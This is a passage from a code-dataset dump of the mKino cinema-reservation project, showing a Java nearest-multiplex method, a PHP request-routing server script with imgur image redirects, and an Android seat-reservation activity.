Pod pojmom \"najbliži\" se misli prostorno najbliži od trenutne lokacije korisnika\r\n\t * @return indeks najbližeg multipleksa\r\n\t */\r\n\tprivate int indeksNajblizegMultipleksa() {\r\n\t\tPratiteljLokacije pratitelj = new PratiteljLokacije(this);\r\n\t\t\r\n\t\tif (pratitelj.lokacijaDostupna())\r\n\t\t{\r\n\t\t\tint indeksNajblizegMultipleksa = 0;\r\n\t\t\tfloat udaljenostDoNajblizegMultipleksa = 999999999; // za početnu udaljenost stavimo neki jako veliki broj (jer se traži najmanja udaljenost)\r\n\t\t\t\r\n\t\t\tfor (MultipleksInfo multipleks : multipleksi)\r\n\t\t\t{\r\n\t\t\t\tfloat tmpUdaljenost = pratitelj.udaljenostDo(multipleks.getZemljopisnaDuzina(), multipleks.getZemljopisnaSirina());\r\n\t\t\t\tif (tmpUdaljenost < udaljenostDoNajblizegMultipleksa)\r\n\t\t\t\t{\r\n\t\t\t\t\tudaljenostDoNajblizegMultipleksa = tmpUdaljenost;\r\n\t\t\t\t\tindeksNajblizegMultipleksa = multipleks.getIdMultipleksa();\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\t\r\n\t\t\treturn indeksNajblizegMultipleksa - 1; // oduzimamo 1 jer u bazi podaci počinju od 1, a nama za spinner trebaju podaci od 0\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\treturn 0;\r\n\t\t}\r\n\t}\r\n}\r\n" }, { "alpha_fraction": 0.5790421962738037, "alphanum_fraction": 0.603501558303833, "avg_line_length": 44.42629623413086, "blob_id": "ab59516d14d09b543d7e51d5935a11f6a01de672", "content_id": "28cc7af3ae32cd67fa936596163697445ff73d98", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 11659, "license_type": "no_license", "max_line_length": 96, "num_lines": 251, "path": "/server-side/Datoteke/skripte/index.php", "repo_name": "dsitum/mKino", "src_encoding": "UTF-8", "text": "<?php\r\n // filmovi\r\n if ($_GET['tip'] == 'filmovi')\r\n {\r\n require_once 'filmovi.php';\r\n $filmovi = Filmovi::DohvatiFilmove($_GET['aktualno']);\r\n echo json_encode($filmovi);\r\n } \r\n else if($_GET['tip'] == 'mr')\r\n {\r\n \r\n require_once 'filmovi.php'; \r\n $korisnik = $_GET['korisnik'];\r\n $uspjesno = Filmovi::DohvatiRezervacije($korisnik);\r\n echo json_encode($uspjesno);\r\n }\r\n else if ($_GET['tip'] == 'nekifilmovi')\r\n {\r\n require_once 'filmovi.php';\r\n $bezOvihFilmova = $_POST['bezOvihFilmova'];\r\n $filmovi = Filmovi::DohvatiNekeFilmove($_GET['aktualno'], $bezOvihFilmova);\r\n echo json_encode($filmovi);\r\n }\r\n \r\n // sve projekcije \r\n else if ($_GET['tip'] == 'projekcije')\r\n {\r\n require_once 'filmovi.php';\r\n $projekcije = Filmovi::DohvatiSveProjekcije($_GET['film'], $_GET['multipleks']);\r\n echo json_encode($projekcije);\r\n }\r\n \r\n // projekcije na današnji dan\r\n else if ($_GET['tip'] == 'projekcijeDanas')\r\n {\r\n require_once 'filmovi.php';\r\n $datum = date('Y-m-d');\r\n $projekcije = Filmovi::DohvatiProjekcijeNaDan($_GET['film'], $_GET['multipleks'], $datum);\r\n echo json_encode($projekcije);\r\n }\r\n \r\n // sve projekcije za multipleks\r\n else if ($_GET['tip'] == 'projekcijeMultipleks')\r\n {\r\n require_once 'filmovi.php';\r\n $bezOvihProjekcija = $_POST['bezOvihProjekcija'];\r\n $projekcije = Filmovi::DohvatiProjekcijeMultipleks($_GET['multipleks'], $bezOvihProjekcija);\r\n echo json_encode($projekcije);\r\n }\r\n // sjedala za projekciju\r\n else if ($_GET['tip'] == 'sjedalaProjekcija')\r\n {\r\n require_once 'filmovi.php'; \r\n $sjedala = Filmovi::DohvatiSjedalaProjekcija($_GET['projekcija']);\r\n echo json_encode($sjedala);\r\n }\r\n //rezervacija ulaznica\r\n else if($_GET['tip'] == 'rezervacija')\r\n {\r\n require_once 'filmovi.php'; \r\n $sjedala = 
$_POST['sjedala'];\r\n $korisnik = $_POST['korisnik'];\r\n $projekcija = $_POST['projekcija'];\r\n \r\n $uspjesno = Filmovi::Rezerviraj($projekcija,$korisnik, $sjedala);\r\n echo json_encode($uspjesno);\r\n }\r\n //moje rezervacije\r\n\r\n //moje rezervacije\r\n else if($_GET['tip'] == 'obrisirezervaciju')\r\n {\r\n require_once 'filmovi.php'; \r\n\t$korisnickoIme = $_POST['korisnickoime'];\r\n $projekcija = $_POST['projekcija'];\r\n \r\n $uspjesno = Filmovi::ObrisiMojuRezervaciju($korisnickoIme, $projekcija);\r\n echo json_encode($uspjesno);\r\n }\r\n // projekcije na odreÄ‘eni dan\r\n else if ($_GET['tip'] == 'projekcijeNaDan')\r\n {\r\n require_once 'filmovi.php';\r\n $godina = $_GET['godina'];\r\n $mjesec = sprintf('%02d', $_GET['mjesec']);\r\n $dan = sprintf('%02d', $_GET['dan']);\r\n $datum = \"$godina-$mjesec-$dan\";\r\n $projekcije = Filmovi::DohvatiProjekcijeNaDan($_GET['film'], $_GET['multipleks'], $datum);\r\n echo json_encode($projekcije);\r\n }\r\n \r\n // prijava korisnika\r\n else if ($_GET['tip'] == 'prijava')\r\n {\r\n require_once 'korisnici.php';\r\n $korisnik = Korisnici::PrijaviSe($_POST['korisnickoIme'], $_POST['lozinka']);\r\n echo json_encode($korisnik);\r\n }\r\n \r\n // registracija korisnika\r\n else if ($_GET['tip'] == 'registracija')\r\n {\r\n require_once 'korisnici.php';\r\n $podaci = array();\r\n $podaci['korisnickoIme'] = $_POST['korisnickoIme'];\r\n $podaci['salt'] = hash('sha512', time());\r\n $podaci['lozinka'] = hash('sha512', $_POST['lozinka'] . $podaci['salt']);\r\n $podaci['ime'] = $_POST['ime'];\r\n $podaci['prezime'] = $_POST['prezime'];\r\n $podaci['email'] = $_POST['email'];\r\n $podaci['telefon'] = $_POST['telefon'];\r\n $povratnaInformacija = Korisnici::RegistrirajSe($podaci);\r\n echo json_encode($povratnaInformacija);\r\n }\r\n \r\n // dohvat multipleksa\r\n else if ($_GET['tip'] == 'multipleksi')\r\n {\r\n require_once 'DB_connect.php';\r\n $upit = \"SELECT * FROM multipleksi\";\r\n $multipleksi = UpitUBazu($upit);\r\n echo json_encode($multipleksi);\r\n }\r\n \r\n // dohvat velikih slika\r\n else if ($_GET['tip'] == 'slike')\r\n {\r\n switch ($_GET['id'])\r\n {\r\n case \"2\": header(\"Location: http://i.imgur.com/41duaTf.jpg\"); break;\r\n case \"3\": header(\"Location: http://i.imgur.com/Lz9I5IV.jpg\"); break;\r\n case \"4\": header(\"Location: http://i.imgur.com/5QHm0os.jpg\"); break;\r\n case \"5\": header(\"Location: http://i.imgur.com/W4ES8Cy.jpg\"); break;\r\n case \"6\": header(\"Location: http://i.imgur.com/ikGcaAB.jpg\"); break;\r\n case \"7\": header(\"Location: http://i.imgur.com/MzjVnsg.jpg\"); break;\r\n case \"8\": header(\"Location: http://i.imgur.com/M7MnWkj.jpg\"); break;\r\n case \"9\": header(\"Location: http://i.imgur.com/A9DfZlk.jpg\"); break;\r\n case \"10\": header(\"Location: http://i.imgur.com/VKTJTOV.jpg\"); break;\r\n \r\n case \"11\": header(\"Location: http://i.imgur.com/b4xOyuV.jpg\"); break;\r\n case \"12\": header(\"Location: http://i.imgur.com/LCJFEUG.jpg\"); break;\r\n case \"13\": header(\"Location: http://i.imgur.com/JJOt68E.jpg\"); break;\r\n case \"14\": header(\"Location: http://i.imgur.com/P2FxpMW.jpg\"); break;\r\n case \"15\": header(\"Location: http://i.imgur.com/TU0Z9iw.jpg\"); break;\r\n case \"16\": header(\"Location: http://i.imgur.com/yd5Ogel.jpg\"); break;\r\n case \"17\": header(\"Location: http://i.imgur.com/TYWQOH8.jpg\"); break;\r\n case \"18\": header(\"Location: http://i.imgur.com/RznPMMI.jpg\"); break;\r\n case \"19\": header(\"Location: http://i.imgur.com/X7PtQu4.jpg\"); break;\r\n 
case \"20\": header(\"Location: http://i.imgur.com/cmODA5w.jpg\"); break;\r\n \r\n case \"21\": header(\"Location: http://i.imgur.com/alUguKF.jpg\"); break;\r\n case \"22\": header(\"Location: http://i.imgur.com/nGHZK2L.jpg\"); break;\r\n case \"23\": header(\"Location: http://i.imgur.com/4f7JLUL.jpg\"); break;\r\n case \"24\": header(\"Location: http://i.imgur.com/K53NSsu.jpg\"); break;\r\n case \"25\": header(\"Location: http://i.imgur.com/yjoEYrl.jpg\"); break;\r\n case \"26\": header(\"Location: http://i.imgur.com/ftgC6GD.jpg\"); break;\r\n case \"27\": header(\"Location: http://i.imgur.com/OlSyMT5.jpg\"); break;\r\n case \"28\": header(\"Location: http://i.imgur.com/W2PgXVM.jpg\"); break;\r\n case \"29\": header(\"Location: http://i.imgur.com/R6Nfg64.jpg\"); break;\r\n case \"30\": header(\"Location: http://i.imgur.com/xu5dxMn.jpg\"); break;\r\n \r\n case \"31\": header(\"Location: http://i.imgur.com/OT1S7Ab.jpg\"); break;\r\n case \"32\": header(\"Location: http://i.imgur.com/LBVVjKB.jpg\"); break;\r\n case \"33\": header(\"Location: http://i.imgur.com/xlyP7ey.jpg\"); break;\r\n case \"34\": header(\"Location: http://i.imgur.com/ycV5Jbm.jpg\"); break;\r\n case \"35\": header(\"Location: http://i.imgur.com/SFvYvfO.jpg\"); break;\r\n case \"36\": header(\"Location: http://i.imgur.com/8ksN3w7.jpg\"); break;\r\n case \"37\": header(\"Location: http://i.imgur.com/RISNSTL.jpg\"); break;\r\n case \"38\": header(\"Location: http://i.imgur.com/GVMkesY.jpg\"); break;\r\n case \"39\": header(\"Location: http://i.imgur.com/J1PSoao.jpg\"); break;\r\n case \"40\": header(\"Location: http://i.imgur.com/ma4wI5O.jpg\"); break;\r\n \r\n case \"41\": header(\"Location: http://i.imgur.com/bvyvVZH.jpg\"); break;\r\n case \"42\": header(\"Location: http://i.imgur.com/H0lry9h.jpg\"); break;\r\n case \"43\": header(\"Location: http://i.imgur.com/az7PGpb.jpg\"); break;\r\n case \"44\": header(\"Location: http://i.imgur.com/vPPo6id.jpg\"); break;\r\n case \"45\": header(\"Location: http://i.imgur.com/ikNySIx.jpg\"); break;\r\n case \"46\": header(\"Location: http://i.imgur.com/4NEJUfJ.jpg\"); break;\r\n case \"47\": header(\"Location: http://i.imgur.com/tYhjKwx.jpg\"); break;\r\n case \"48\": header(\"Location: http://i.imgur.com/Xnl2Jfm.jpg\"); break;\r\n case \"49\": header(\"Location: http://i.imgur.com/lmsD41e.jpg\"); break;\r\n }\r\n }\r\n \r\n \r\n // dohvat malih slika\r\n else if ($_GET['tip'] == 'slikemale')\r\n {\r\n\tswitch ($_GET['id'])\r\n\t{\r\n\t case \"2\": header(\"Location: http://i.imgur.com/fhuwmjN.jpg\"); break;\r\n case \"3\": header(\"Location: http://i.imgur.com/shncnOp.jpg\"); break;\r\n case \"4\": header(\"Location: http://i.imgur.com/l1ZkxI2.jpg\"); break;\r\n case \"5\": header(\"Location: http://i.imgur.com/YQbfygu.jpg\"); break;\r\n case \"6\": header(\"Location: http://i.imgur.com/oPdiKUZ.jpg\"); break;\r\n case \"7\": header(\"Location: http://i.imgur.com/NBsc8a0.jpg\"); break;\r\n case \"8\": header(\"Location: http://i.imgur.com/xI5ayDs.jpg\"); break;\r\n case \"9\": header(\"Location: http://i.imgur.com/zNTEjWw.jpg\"); break;\r\n case \"10\": header(\"Location: http://i.imgur.com/Gpb6t9t.jpg\"); break;\r\n \r\n case \"11\": header(\"Location: http://i.imgur.com/6CdX34K.jpg\"); break;\r\n case \"12\": header(\"Location: http://i.imgur.com/CD5y8OS.jpg\"); break;\r\n case \"13\": header(\"Location: http://i.imgur.com/9jJXkJs.jpg\"); break;\r\n case \"14\": header(\"Location: http://i.imgur.com/NJlzEih.jpg\"); break;\r\n case \"15\": header(\"Location: 
http://i.imgur.com/tfCJrV6.jpg\"); break;\r\n case \"16\": header(\"Location: http://i.imgur.com/aQqIrbx.jpg\"); break;\r\n case \"17\": header(\"Location: http://i.imgur.com/rLuAtwh.jpg\"); break;\r\n case \"18\": header(\"Location: http://i.imgur.com/xVkne5N.jpg\"); break;\r\n case \"19\": header(\"Location: http://i.imgur.com/BTxPbMM.jpg\"); break;\r\n case \"20\": header(\"Location: http://i.imgur.com/mtWD9es.jpg\"); break;\r\n \r\n case \"21\": header(\"Location: http://i.imgur.com/uDhILCV.jpg\"); break;\r\n case \"22\": header(\"Location: http://i.imgur.com/SNU5hAY.jpg\"); break;\r\n case \"23\": header(\"Location: http://i.imgur.com/Y3CwUNK.jpg\"); break;\r\n case \"24\": header(\"Location: http://i.imgur.com/Y0l9Q4z.jpg\"); break;\r\n case \"25\": header(\"Location: http://i.imgur.com/ssnK6Vm.jpg\"); break;\r\n case \"26\": header(\"Location: http://i.imgur.com/v1h7CAi.jpg\"); break;\r\n case \"27\": header(\"Location: http://i.imgur.com/zjbVdfr.jpg\"); break;\r\n case \"28\": header(\"Location: http://i.imgur.com/fQfICzc.jpg\"); break;\r\n case \"29\": header(\"Location: http://i.imgur.com/DNfo0aF.jpg\"); break;\r\n case \"30\": header(\"Location: http://i.imgur.com/ycJ8KLs.jpg\"); break;\r\n \r\n case \"31\": header(\"Location: http://i.imgur.com/z8Hd68m.jpg\"); break;\r\n case \"32\": header(\"Location: http://i.imgur.com/Ewhy0AZ.jpg\"); break;\r\n case \"33\": header(\"Location: http://i.imgur.com/XXxwvIC.jpg\"); break;\r\n case \"34\": header(\"Location: http://i.imgur.com/Dpp0M94.jpg\"); break;\r\n case \"35\": header(\"Location: http://i.imgur.com/WVtj1mL.jpg\"); break;\r\n case \"36\": header(\"Location: http://i.imgur.com/CAiV3FU.jpg\"); break;\r\n case \"37\": header(\"Location: http://i.imgur.com/xuuSCoM.jpg\"); break;\r\n case \"38\": header(\"Location: http://i.imgur.com/dVUNbps.jpg\"); break;\r\n case \"39\": header(\"Location: http://i.imgur.com/DETgBHh.jpg\"); break;\r\n case \"40\": header(\"Location: http://i.imgur.com/1giMHc5.jpg\"); break;\r\n \r\n case \"41\": header(\"Location: http://i.imgur.com/vHGma35.jpg\"); break;\r\n case \"42\": header(\"Location: http://i.imgur.com/5RqA71y.jpg\"); break;\r\n case \"43\": header(\"Location: http://i.imgur.com/pje2KYS.jpg\"); break;\r\n case \"44\": header(\"Location: http://i.imgur.com/ExWIfhd.jpg\"); break;\r\n case \"45\": header(\"Location: http://i.imgur.com/fZFGUJ6.jpg\"); break;\r\n case \"46\": header(\"Location: http://i.imgur.com/NCy0e8k.jpg\"); break;\r\n case \"47\": header(\"Location: http://i.imgur.com/6xXmYyG.jpg\"); break;\r\n case \"48\": header(\"Location: http://i.imgur.com/qCOpBtG.jpg\"); break;\r\n case \"49\": header(\"Location: http://i.imgur.com/ArseZX8.jpg\"); break;\r\n\t}\r\n }\r\n \r\n // pogreška\r\n else\r\n {\r\n echo \"Nisu uneseni parametri\";\r\n }\r\n?> " }, { "alpha_fraction": 0.6528083682060242, "alphanum_fraction": 0.6554985046386719, "avg_line_length": 31.516393661499023, "blob_id": "83af44dc42919d4ca40697d7fda221e2a07a7ac1", "content_id": "8b3de4cde2cbb6904e63af24ab4b5bab63d718d4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 12286, "license_type": "no_license", "max_line_length": 149, "num_lines": 366, "path": "/client-side/src/hr/air/mkino/RezervacijaActivity.java", "repo_name": "dsitum/mKino", "src_encoding": "WINDOWS-1250", "text": "package hr.air.mkino;\r\n\r\n\r\n\r\nimport java.util.ArrayList;\r\nimport java.util.Iterator;\r\nimport java.util.List;\r\n\r\nimport hr.air.mkino.baza.MultipleksAdapter;\r\nimport 
hr.air.mkino.baza.PrijavljeniKorisnikAdapter;\r\n\r\nimport hr.air.mkino.baza.ProjekcijeAdapter;\r\nimport hr.air.mkino.core.Prijava;\r\nimport hr.air.mkino.server.JsonDohvatiSjedala;\r\nimport hr.air.mkino.server.JsonRezervacija;\r\nimport hr.air.mkino.sucelja.ISlikaFilma;\r\nimport hr.air.mkino.tipovi.Korisnik;\r\nimport hr.air.mkino.tipovi.MultipleksInfo;\r\nimport hr.air.mkino.tipovi.ProjekcijaInfo;\r\nimport hr.air.mkino.tipovi.RezervacijaInfo;\r\nimport hr.air.mkino.uzorcidizajna.UcitajSlikuFactory;\r\n\r\nimport android.app.Activity;\r\nimport android.app.AlertDialog;\r\nimport android.app.Dialog;\r\nimport android.content.Context;\r\nimport android.content.DialogInterface;\r\n\r\nimport android.content.Intent;\r\nimport android.os.Bundle;\r\n\r\nimport android.view.View;\r\n\r\nimport android.view.Window;\r\nimport android.view.View.OnClickListener;\r\n\r\nimport android.widget.Button;\r\nimport android.widget.ImageView;\r\n\r\nimport android.widget.TextView;\r\nimport android.widget.Toast;\r\n/**\r\n * Ovom su klasom ostvarene rezervacije.\r\n * @author bstivic\r\n *\r\n */\r\npublic class RezervacijaActivity extends Activity {\r\n\t\r\n\tCharSequence[] sjedalaPrikaz = {};\r\n\tboolean [] sjedalaBool = {};\r\n\tList<Integer> sjedalaZauzeta = new ArrayList<Integer>();\r\n\tList<Integer> listaOdabranih = new ArrayList<Integer>();\r\n\tfinal int BROJ_SJEDALA = 60;\r\n\tfinal int OGRANICENJE_SJEDALA = 30;\r\n\tfinal Context con = this;\r\n\tboolean moguceRezervirati = true;\r\n\tint idProjekcije;\r\n\tProjekcijaInfo detaljiProjekcije;\r\n\t\r\n\t@Override\r\n\tprotected void onCreate(Bundle savedInstanceState) {\r\n\t\tsuper.onCreate(savedInstanceState);\r\n\t\tsetContentView(R.layout.activity_rezervacije);\r\n\t\tsetTitle(\"Rezervacija projekcije\");\r\n\t\t\r\n\t\tTextView sjedalaTV = (TextView) findViewById(R.id.rezervacije_sjedala_txt);\t\r\n\t\tButton btnMapaSjedala = (Button) findViewById(R.id.btn_rezervacije_mapa_sjedala);\r\n\t\tButton btnRezerviraj = (Button) findViewById(R.id.btn_rezervacija_rezerviraj);\r\n\t\tdetaljiProjekcije = dohvatiPodatkeZaProjekciju();\r\n\t\tprikaziPodatkeZaProjekciju(detaljiProjekcije);\r\n\t\tIntent i = getIntent();\t\r\n\r\n\t\tfinal int idProjekcijeUBazi = i.getIntExtra(\"idProjekcijeUBazi\", 0);\r\n\t\tidProjekcije = idProjekcijeUBazi;\r\n\t\tJsonDohvatiSjedala dhSj = new JsonDohvatiSjedala();\t\t\r\n\t\tsjedalaZauzeta = dhSj.dohvatiSjedala(idProjekcijeUBazi);\r\n\t\t\r\n\t\tmoguceRezervirati = provjeriZauzetost();\r\n\t\r\n\t\tfiltrirajSlobodnaSjedala();\r\n\r\n\t\t/* *\r\n\t\t * Ukoliko nije moguće rezervirati sjedala za odabranu projekciju iz pojedinih razloga, onda ćemo korisniku\r\n\t\t * zabraniti odabir sjedala, pregled mape i klik na rezervaciju!\r\n\t\t * */\r\n\t\tif(moguceRezervirati)\r\n\t\t{\r\n\t\t\tsjedalaTV.setOnClickListener(new OnClickListener() {\t\t\t\r\n\t\t\t\t@Override\r\n\t\t\t\tpublic void onClick(View v) {\t\t\t\r\n\t\t\t\t\tprikaziDijalog();\r\n\t\t\t\t}\r\n\t\t\t});\r\n\t\t\t\r\n\t\t\r\n\t\t\tfinal Dialog dialogSjedala = new Dialog(con);\r\n\t\t\tdialogSjedala.requestWindowFeature(Window.FEATURE_NO_TITLE);\r\n\t\t\tdialogSjedala.setContentView(R.layout.dialog_mapa_sjedala);\r\n\t\r\n\t\t\t\r\n\t\t\tbtnMapaSjedala.setOnClickListener(new OnClickListener() {\t\t\t\r\n\t\t\t\t@Override\r\n\t\t\t\tpublic void onClick(View v) {\r\n\t\t\t\t\tdialogSjedala.show();\r\n\t\t\t\t\tButton gumbZaIzlaz = (Button) dialogSjedala.findViewById(R.id.mapa_sjedala_nastavi_btn);\r\n\t\t\t\t\tgumbZaIzlaz.setOnClickListener(new 
OnClickListener() {\r\n\t\t\t\t\t\t@Override\r\n\t\t\t\t\t\tpublic void onClick(View v) {\r\n\t\t\t\t\t\t\tdialogSjedala.hide();\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t});\t\t\t\t\r\n\t\t\t\t}\r\n\t\t\t});\r\n\t\t\tbtnRezerviraj.setOnClickListener(new OnClickListener() {\t\t\t\r\n\t\t\t\t@Override\r\n\t\t\t\tpublic void onClick(View v) {\r\n\t\t\t\t\trezerviraj();\t\t\t\t\t\r\n\t\t\t\t}\r\n\t\t\t});\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\tToast.makeText(this, R.string.rezervacija_nije_moguce_rezervirati, Toast.LENGTH_LONG).show();\r\n\t\t}\r\n\t}\r\n\t\r\n\t/*\r\n\t * Metoda koja prvo utvrđuje je li moguće izvršiti rezervaciju,\r\n\t * ukoliko nije moguće izvršiti rezervaciju korisniku se prikazuje poruka. \r\n\t * Ako korisnik nije odabrao sjedala za projekciju rezervacija se obustavlja i prikazuje se poruka.\r\n\t * Ukoliko su svi preuvjeti zadovoljeni nastavlja se korak rezervacije.\r\n\t * */\r\n\tpublic void rezerviraj()\r\n\t{\r\n\t\tPrijavljeniKorisnikAdapter prijavljeniKorisnik = new PrijavljeniKorisnikAdapter(this);\r\n\t\tKorisnik korisnik = prijavljeniKorisnik.dohvatiPrijavljenogKorisnika();\r\n\t\tContext context = this;\r\n \tPrijava prijava = new Prijava();\r\n\t\t\r\n\t\tif(!moguceRezervirati)\r\n\t\t{\r\n\t\t\tToast.makeText(this, R.string.rezervacija_nije_moguce_rezervirati, Toast.LENGTH_LONG).show();\r\n\t\t}\r\n\t\telse if(listaOdabranih.size() == 0)\r\n\t\t{\r\n\t\t\tToast.makeText(this, R.string.rezervacija_odaberite_sjedala, Toast.LENGTH_LONG).show();\r\n\t\t}\r\n\t\telse if( korisnik == null)\r\n\t\t{\r\n\t\t\tprijava.prikaziDijalog(context);\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\tJsonRezervacija jsonRezervacije = new JsonRezervacija();\r\n\t\t\tRezervacijaInfo rezervacija = jsonRezervacije.rezerviraj(korisnik.getKorisnickoIme(), idProjekcije, listaOdabranih);\r\n\t\t\tif(rezervacija == null)\r\n\t\t\t{\r\n\t\t\t\tAlertDialog.Builder builder = new AlertDialog.Builder(this);\r\n\t\t builder.setMessage(R.string.rezervacija_pogreska_kod_registracije)\r\n\t\t .setPositiveButton(R.string.rezervacija_shvacam, new DialogInterface.OnClickListener() {\r\n\t\t public void onClick(DialogInterface dialog, int id) {\r\n\t\t \t \r\n\t\t \r\n\t\t }\r\n\t\t });\r\n\t\t builder.show();\r\n\t\t\t}\r\n\t\t\telse\r\n\t\t\t{\r\n\t\t\t\tAlertDialog.Builder builder = new AlertDialog.Builder(this);\r\n\t\t builder.setTitle(R.string.rezervacija_uspjesna)\r\n\t\t \t\t.setMessage(\"Kod rezervacije: \" + rezervacija.getKodRezervacije())\r\n\t\t .setPositiveButton(R.string.rezervacija_nastavi, new DialogInterface.OnClickListener() {\r\n\t\t public void onClick(DialogInterface dialog, int id) {\r\n\t\t \t RezervacijaActivity.this.finish();\r\n\t\t \t Intent intent = new Intent(RezervacijaActivity.this, PocetnaActivity.class);\r\n\t\t startActivity(intent);\r\n\t\t }\r\n\t\t });\r\n\t\t builder.show();\r\n\t\t \r\n\t\t \r\n\t\t \r\n\t\t \r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\t\r\n\tpublic float IzracunajCijenu()\r\n\t{\r\n\t\treturn listaOdabranih.size() * detaljiProjekcije.getCijena();\r\n\t}\r\n\t/**\r\n\t * Metoda koja provjerava je li moguće rezervirati sjedala za projekciju. 
Ako je projekcija rezervirana više od 30% nije moguće rezervirati ulaznice\r\n\t * @return true ako je moguće, false ako je nemoguće\r\n\t */\r\n\tpublic boolean provjeriZauzetost()\r\n\t{\r\n\t\tfloat postotakZauzetosti = 0;\r\n\t\tif(sjedalaZauzeta.size() != 0 ) \r\n\t\t\tpostotakZauzetosti = BROJ_SJEDALA / sjedalaZauzeta.size()*100;\r\n\t\telse \r\n\t\t\treturn true;\r\n\t\tif(postotakZauzetosti <= 100-OGRANICENJE_SJEDALA)\r\n\t\t\treturn false;\r\n\t\telse\r\n\t\t\treturn true;\r\n\t}\r\n\r\n\t\r\n\t/**\r\n\t * Metoda koja služi za dohvaćanje podataka o projekciji\r\n\t * @return projekcija\r\n\t */\r\n\tprivate ProjekcijaInfo dohvatiPodatkeZaProjekciju() {\r\n\t\tIntent i = getIntent();\r\n\t\tint idProjekcijeUBazi = i.getIntExtra(\"idProjekcijeUBazi\", 0);\r\n\t\t\r\n\t\tProjekcijeAdapter pa = new ProjekcijeAdapter(this);\r\n\t\r\n\t\treturn pa.dohvatiProjekciju(idProjekcijeUBazi, this);\r\n\t}\r\n\t\r\n\t/**\r\n\t * Metoda koja služi za prikaz podataka o projekciji na osnovu proslijeđene projekcije\r\n\t * @param projekcija\r\n\t */\r\n\tprivate void prikaziPodatkeZaProjekciju(ProjekcijaInfo detaljiProjekcije) {\r\n\t\tTextView naslov = (TextView) findViewById(R.id.projekcija_naslov_filma);\r\n\r\n\t\tImageView slika = (ImageView) findViewById(R.id.projekcija_slikaFilma);\r\n\t\tTextView dvorana = (TextView) findViewById(R.id.txt_rezervacije_dvorana);\r\n\t\tTextView vrijeme = (TextView) findViewById(R.id.txt_rezervacije_vrijeme);\r\n\t\tTextView multipleks = (TextView) findViewById(R.id.txt_rezervacije_grad);\r\n\t\tTextView cijena = (TextView) findViewById(R.id.rezervacija_cijena);\r\n\t\tnaslov.setText(detaljiProjekcije.getNaziv());\r\n\t\tcijena.setText(\"0.00\");\r\n\t\tdvorana.setText(\"Dvorana \"+detaljiProjekcije.getDvorana());\t\t\r\n\t\tString vrijePocetkString = detaljiProjekcije.getVrijemePocetka();\r\n\t\tvrijeme.setText(vrijePocetkString);\r\n\t\t\r\n\t\t//dohvaćanje multipleksa iz lokalne baze podatka\r\n\t\tMultipleksAdapter ma = new MultipleksAdapter(this);\r\n\t\tMultipleksInfo multipl = ma.dohvatiMultipleks(detaljiProjekcije.getMultipleks());\r\n\t\tif(multipl != null) multipleks.setText(multipl.getNaziv());\t\t\r\n\t\t\r\n\t\tISlikaFilma sf = UcitajSlikuFactory.ucitaj(this, detaljiProjekcije.getIdFilma(), true);\r\n\t\tslika.setImageBitmap(sf.dohvatiVelikuSliku());\r\n\t\t\r\n\t}\r\n\r\n\t/**\r\n\t * Metoda koja služi za prikaz dijaloga sa popisom slobodnih sjedala\r\n\t * Nakon odabira sjedala navedeni se spremaju u listu odabranih sjedala\r\n\t */\r\n\tprivate void prikaziDijalog(){\t\t\t\r\n\t\tAlertDialog.Builder builder = new AlertDialog.Builder(this);\r\n builder.setTitle(R.string.odabir_sjedala_txt_odaberi_sjedalo) \r\n .setMultiChoiceItems(sjedalaPrikaz, sjedalaBool,\r\n new DialogInterface.OnMultiChoiceClickListener() {\r\n @Override\r\n public void onClick(DialogInterface dialog, int which,\r\n boolean isChecked) {\r\n \t String parsiran = (String) sjedalaPrikaz[which];\r\n \t String[] pars = parsiran.split(\" \");\r\n if (isChecked) {\r\n // If the user checked the item, add it to the selected items \t\r\n \t listaOdabranih.add(Integer.parseInt(pars[1]));\r\n } else \r\n {\r\n \t for (Iterator<Integer> iter = listaOdabranih.listIterator(); iter.hasNext(); ) {\r\n \t\t int a = iter.next();\r\n \t\t int b = Integer.parseInt(pars[1]);\r\n \t\t if ( b == a) {\r\n \t\t iter.remove();\r\n \t\t }\r\n \t\t}\r\n \t\r\n }\r\n azurirajOdabranaMjesta();\r\n /*TODO prikazi cijenu na layoutu i invalidate napravi*/\r\n \r\n \r\n }\r\n }) \r\n 
.setPositiveButton(R.string.odabir_sjedala_btn_prihvati, new DialogInterface.OnClickListener() {\r\n public void onClick(DialogInterface dialog, int id) {\r\n // RezervacijaActivity.this.finish();\r\n }\r\n });\r\n \r\n builder.create().show(); \r\n\r\n\t}\r\n\r\n\t/**\r\n\t * Metoda koja ažurira popis odabranih mjesta\r\n\t */\r\n\tpublic void azurirajOdabranaMjesta()\r\n\t{\r\n\t\tTextView sjedalaTV = (TextView) findViewById(R.id.rezervacije_sjedala_txt);\t\r\n\t\tTextView cijena = (TextView) findViewById(R.id.rezervacija_cijena);\r\n\t\tif(listaOdabranih.size() == 0)\r\n\t\t{\r\n\t\t\tsjedalaTV.setText(R.string.odabir_sjedala_txt_odaberi_sjedalo);\r\n\t\t\tcijena.setText(\"0.00\");\r\n\t\t\tsjedalaTV.invalidate();\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\tcijena.setText(Float.toString(IzracunajCijenu()));\r\n\t\t\tcijena.invalidate();\r\n\t\t\tString text = \"\";\r\n\t\t\tfor (Integer sjedalo : listaOdabranih) {\r\n\t\t\t\ttext += (\"\"+ Integer.toString(sjedalo)+\", \");\r\n\t\t\t}\r\n\t\t\ttext = text.substring(0,text.length()-3);\r\n\t\t\tsjedalaTV.setText(text);\r\n\t\t\tsjedalaTV.invalidate();\r\n\t\t}\r\n\t\t\r\n\t}\r\n\r\n\t/**\r\n\t * Metoda koja ubacuje slobodna sjedala u listu slobodnih sjedala, te dodjeljuje niz odabranih vrijednosti u checkboxu\r\n\t */\r\n\tpublic void filtrirajSlobodnaSjedala()\r\n\t{\r\n\t\t\r\n\t\tint indeksNiza = 0;\r\n\t\tif(sjedalaZauzeta != null)\r\n\t\t{\r\n\t\t\tint brojSlobodnihSj = BROJ_SJEDALA - sjedalaZauzeta.size();\r\n\t\t\tsjedalaBool = new boolean[brojSlobodnihSj];\r\n\t\t\tsjedalaPrikaz = new 